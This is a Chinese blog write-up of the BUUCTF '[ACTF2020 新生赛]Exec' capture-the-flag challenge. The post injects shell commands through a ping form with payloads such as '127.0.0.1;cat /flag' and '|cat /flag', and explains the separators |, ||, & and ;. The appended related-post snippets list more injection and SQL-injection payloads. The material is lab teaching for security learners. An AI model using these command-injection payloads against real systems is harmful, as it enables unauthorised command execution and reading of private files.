BUUCTF_Web_[ACTF2020 新生赛]Exec

最新推荐文章于 2023-03-02 19:02:44 发布
最新推荐文章于 2023-03-02 19:02:44 发布
阅读量170 收藏
点赞数
分类专栏: BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52250313/article/details/119278951
版权

BUUCTF_Web_[ACTF2020 新生赛]Exec

首先打开靶机

在这里插入图片描述

可以看出,这是一道有关命令执行的题

根据经验,可以尝试127.0.0.1;cat /flag

在这里插入图片描述

;cat /flag

127.0.0.1|cat /flag

|cat /flag

127.0.0.1||cat /flag

||cat /flag

127.0.0.1&cat /flag

&cat /flag

以上命令均可查询到flag

没有过滤的题,可以利用常见的管道命令符执行

  1. |(按位或),直接执行|后面的语句

  2. ||(逻辑或),如果前面命令是错的那么就执行后面的语句,否则只执行前面的语句

  3. &(按位与),&前面和后面命令都要执行,无论前面真假

  4. &&(逻辑与),如果前面为假,后面的命令也不执行,如果前面为真则执行两条命令

  5. ; 前后都执行,无论前面真假,同&,(linux也有)

阿刁〇하
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
BUUCTF学习记录Web合集
AugenStern的博客
08-21 338
题目ACTF-WebACTF2020 新生 Include1ACTF2020 新生 Exec 1ACTF2020 新生 BackupFile 1ACTF2020 新生 Upload 1 ACTF-Web ACTF2020 新生 Include1 知识点:文件包含 打开容器 直接获得flag.php的base64 解码得到flag ACTF2020 新生 Exec 1 知识点:命令注入 ping一下127.0.0.1; 无报错回显,说明无WAF,用截断符号配合普通命令,得到flag
潞安矿区高河井田构造样式探讨
06-24
高河井田位于沁水块坳东南部,主要含煤地层包括二叠系下统山西组和石炭系上统太原组,构造要素走向总体为近SN—NNE向。通过对高河井田构造的系统分析,划分了两大类三亚类主要构造样式,并结合实例分析了各种构造样式对...
BUUCTF Web [ACTF2020 新生]Exec
热门推荐
wangyuxiang946的博客
10-27 1万+
「作者主页」:士别三日wyx   此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之九十九的同期选手。 [ACTF2020 新生]Exec一、题目简介二、思路分析三、解题步骤1)遍历目录2)查看文件内容四、总结 一、题目简介 进入题目连接后,是一个ping的「功能」,我们输入ip地址或域名后可以使用ping命令「测试」网络的连通性 二、思路分析   &nbs.
buuctf web题[ACTF2020 新生]Exec
qq_44740774的博客
09-25 242
buuctf web的[ACTF2020 新生]Exec
BUUCTF WEB exec+lovesql
qq_41696858的博客
08-18 200
攻防世界靶场不知道咋了,又进不去了 那就刷几题BUUCTF吧 exec 这题题目名字给的挺明显的,命令执行 经检测,|,||没有被过滤,且有回显,那就一级级往上找就行了 127.0.0.1|ls ../../../ 127.0.0.1|cat ../../../flag LoveSql SQL注入,注入点和之前一样的,一个单引号直接回显 那么后面就是payload了 admin 123' order by 4 # 开始报不同的错,可知列数为3 admin 123' union select 1,2,3
BUUCTF【Web】Exec(命令执行漏洞)
qq_70434663的博客
03-02 984
在根目录中我们发现有一个flag文件,猜测我们的flag就在里面,所以我们需要使用命令来读取flag文件的内容。命令大家可以在网上查看,这里使用的命令是127.0.0.1 & cat /flag(也可以使用127.0.0.1 | cat /flag)了解拼接符后我们先试一下查看目录,发现使用127.0.0.1 && ls执行不了,使用127.0.0.1 & ls有回显。在进入靶场后发现窗口ping,猜测可能是SQL注入,也有可能是命令执行漏洞。命令执行就用命令拼接符执行漏洞命令就行。
matlab的90个实例.rar_actf8x_matlab基础知识的90个实例
09-24
学习matlab的基本使用例子,有矩阵运算,绘制曲线图等
Jeopardy-Writeups:SniperOJ的CTF挑战比
05-18
SniperOJ的挑战文章和源代码描述平台...─ pwn│ ├── pwn100-bof-x86-64│ ├── pwn100-shellcode-x86-64│ ├── pwn150-static-x86-64│ ├── pwn200-actf-run-circles│ ├── pwn200-shorter-shellc
NTFS文件系统分析
09-19
NTFS文件系统分析,比较详细的介绍,各个元文件的定义,偏移
光立方888 573 2803程序
06-14
光立方888 573 2803程序,有详细的原理图
BUUCTF-Web-命令执行-[ACTF2020 新生]Exec
weixin_42566218的博客
03-09 4103
BUUCTF-Web-命令执行-[ACTF2020 新生]Exec 题目链接:BUUCTF 类型:命令注入 知识点:命令拼接符(||、;、&&…) 解题过程 这道题目比较简单,打开发现是一个ping命令执行页面,使用post接受参数 测试命令拼接符";"发现未进行过滤,拼接ls命令得到回显 target=127.0.0.1;ls 查看index.php源码发现目标未对参数进行任何过滤 target=127.0.0.1;cp index.php 1.txt 网页
BUUCTF:[ACTF2020 新生]Exec
末初的CSDN博客
10-20 326
题目地址:https://buuoj.cn/challenges#[ACTF2020%20%E6%96%B0%E7%94%9F%E8%B5%9B]Exec 命令执行,使用;或者|进行注入 在根目录发现flag,直接读取
BUUCTF [ACTF2020 新生] Exec
Senimo
10-18 940
BUUCTF [ACTF2020 新生] Exec 启动靶机,打开环境: 页面可以执行Ping命令,判断应为命令执行漏洞 尝试输入正常IP127.0.0.1查看其回显: 127.0.0.1 其为正常回显,测试管道连接符|是否能用: 127.0.0.1 | ls 管道连接符|可以正常使用,并且ls命令可以正常执行 查看根目录: 127.0.0.1 | ls / 发现flag文件,使用cat命令查看: 127.0.0.1 | cat /flag 得到flag 基础的通过管道连接符|就可以的命
[原题复现]百度杯CTF比 十月场 WEB EXEC(PHP弱类型)
笑花大王
03-12 666
简介 原题复现: 考察知识点:PHP弱类型、 线上平台:https://www.ichunqiu.com/battalion(i春秋 CTF平台) 过程 看源码发现这个 vim泄露 下方都试了一遍 。index.php.swp是的 下载源码即可 .index.php.swpindex.php.swp ——vim文件泄露index.php.bakindex.php~ 要通过...
BUUCTF web [ACTF2020 新生]Exec [强网杯 2019]随便注
qq_61988806的博客
10-26 864
BUUCTF web [ACTF2020 新生]Exec [强网杯 2019]随便注
CTFHub技能书解题笔记-RCE-过滤cat
qq_43006864的博客
04-01 2748
打开题目,提示我们过滤了cat命令,也就是不能用cat来读取flag的值。 这里的话我就去查了linux读取文件的命令。 cat 从第一行开始显示文本内容(适用于内容较少的) Tac 从最后一行开始显示,是 cat 的逆顺序 More 一页一页的显示文本内容(适用于内容较多的) less 与 more 类似,但是比 more 更好的是,它可以..
CTF命令执行的常见姿势
weixin_40103894的博客
09-28 1478
1.**cat fl[abc]g.php ** //匹配[abc]中的任何一个。11.**vi **–使用vi打开文本cat 由第一行开始显示内容,并将所有内容输出。1.**wh\o\ami ** //反斜线绕过。3.**cat fla* ** //用*匹配任意。3.**whoa’m’i ** //单引号绕过。4.**whoam``i ** //反引号绕过。8.**nl **–类似于cat -n,显示时输出行号。
BUUCTF-练习场-Web(5-8)
m0_62905745的博客
10-26 1447
SQL注入的解题大概步骤,以及爆表爆库查字段 绕过空格,替换字符的方法 命令执行漏洞
CTF 夺旗 Capture the Flag(探测可存储的flag)
qq_43613772的博客
06-08 5383
CTF是一种流行的信息安全竞形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗”。其大致流程是,参团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比环境中得到一串具有一定格式的字符串或其他内容,并将其提交给主办方,从而夺得分数。为了方便称呼,我们把这样的内容称之为“Flag”。 信息探测: 扫描主机开放的端口号: nmap -p- -T4 靶场IP地址 和前几次一样的快速...
[ACTF2020 新生]Exec 1
最新发布
09-19
关于 [ACTF2020 新生]Exec 1 的题目中的命令注入问题,根据引用的内容来分析,可以使用命令注入来解题。在这道题目中,使用命令注入的方式进行解题,首先通过测试命令 "ping 127.0.0.1" 来验证是否可以执行命令...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

阿刁〇하

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值